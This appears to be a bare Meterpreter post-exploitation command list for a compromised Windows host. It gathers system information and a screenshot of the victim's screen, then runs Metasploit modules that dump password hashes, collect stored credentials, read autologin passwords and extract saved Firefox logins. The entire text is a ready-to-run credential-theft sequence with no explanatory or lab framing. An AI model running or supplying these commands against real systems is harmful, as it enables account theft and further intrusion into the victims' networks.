sysinfo
screenshot -v -p dump.jpeg -v true
run post/windows/gather/hashdump
run post/windows/gather/credential_collector
run post/windows/gather/credentials/windows_autologin
run post/multi/gather/firefox_creds
